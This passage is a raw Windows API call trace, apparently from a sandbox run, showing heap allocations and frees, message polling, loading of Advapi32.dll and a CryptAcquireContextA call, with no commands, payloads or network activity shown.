Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0223.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0223.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.431] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0223.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.432] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.432] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0223.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.433] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0223.433] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0223.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.433] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0223.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.434] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0223.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.434] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.435] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0223.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.435] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ba8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0223.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0223.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0223.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0223.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.436] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0223.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0223.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0223.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0223.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0223.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0223.518] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0223.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0223.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0223.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0223.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0223.519] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.519] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0223.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0223.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.519] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.520] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | 